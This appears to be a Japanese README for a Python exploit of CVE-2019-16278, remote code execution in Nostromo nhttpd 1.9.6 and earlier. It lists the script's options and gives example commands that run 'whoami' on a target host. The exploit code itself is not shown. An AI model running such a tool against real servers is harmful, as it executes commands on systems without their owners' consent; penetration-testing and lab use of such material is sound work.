
Nostromo nhttpd <= 1.9.6 における RCE を悪用する Python スクリプト。
Nostromo nhttpd <= 1.9.6 におけるRCEを悪用するPythonスクリプト。
usage: CVE-2019-16278.py [-h] [-t TARGET] [-p PORT] [-c COMMAND] [-b BYTES]
CVE-2019-16278 - Nostromo 1.9.6 RCE のエクスプロイト
optional arguments:
-h, --help このヘルプメッセージを表示して終了
-t TARGET, --target TARGET
対象のリモートホスト
-p PORT, --port PORT 対象のリモートポート
-c COMMAND, --command COMMAND
サーバ上で実行するコマンド
-b BYTES, --bytes BYTES
レスポンスで受信するバイト数
エクスプロイトを実行
python CVE-2019-16278.py -t 10.10.10.10. -p 80 -c whoami
エクスプロイトを実行し、レスポンスでより多くのバイトを受信する
python CVE-2019-16278.py -t 10.10.10.10. -p 80 -c whoami -b 4096